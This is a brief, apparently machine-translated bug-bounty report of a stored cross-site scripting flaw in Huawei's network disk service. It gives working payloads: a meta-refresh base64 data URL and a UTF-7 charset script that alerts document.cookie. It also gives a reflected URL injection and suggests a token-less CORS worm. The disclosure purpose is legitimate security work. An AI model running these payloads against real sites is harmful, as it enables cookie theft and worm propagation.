Huawei network disk storage type xss

Huawei network disk storage type xss

RT. Thk @/fd.

Detailed description:

Buy glory 6. Test it ..

Upload a file. Release External links. Modify external link name

The entity encoding can generate an output point.

Code Region

<Meta name = "keywords" content = "", output point, network disk, Huawei network disk, DBank network disk, free network disk, network hard disk, Network Disk download, network storage space, cloud storage "/>



Two exploitation methods,

First, http-equiv = "Refresh"

Insert Code

Code Region

0,url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"http-equiv="Refresh".txt











Because it is data. The cookie cannot be passed. However, we found that most of Huawei's operations do not have token, so we can use Cross-Origin Resource Sharing (cors) post data to cause worms and other impacts.



Second. Ie only

Use Code



Code Region

"charset=utf-7 +AD4APA-script+AD4-alert(document.cookie)+ADw-/script+AD4-



Ie or qq browser (ie kernel browser)

Http://dl.vmall.com/c0iem6xdrx? V= 149900454 & % 3 Cmeta % 20http-equiv % 3D





In this way, data such as cookies can be transmitted. The disadvantage is browser restrictions and similar reflective xss.

The principle is that the get data includes <meta http-equiv> and the original charset is called using xss filter.

Proof of vulnerability:

As mentioned above

Solution:

Filter more ~~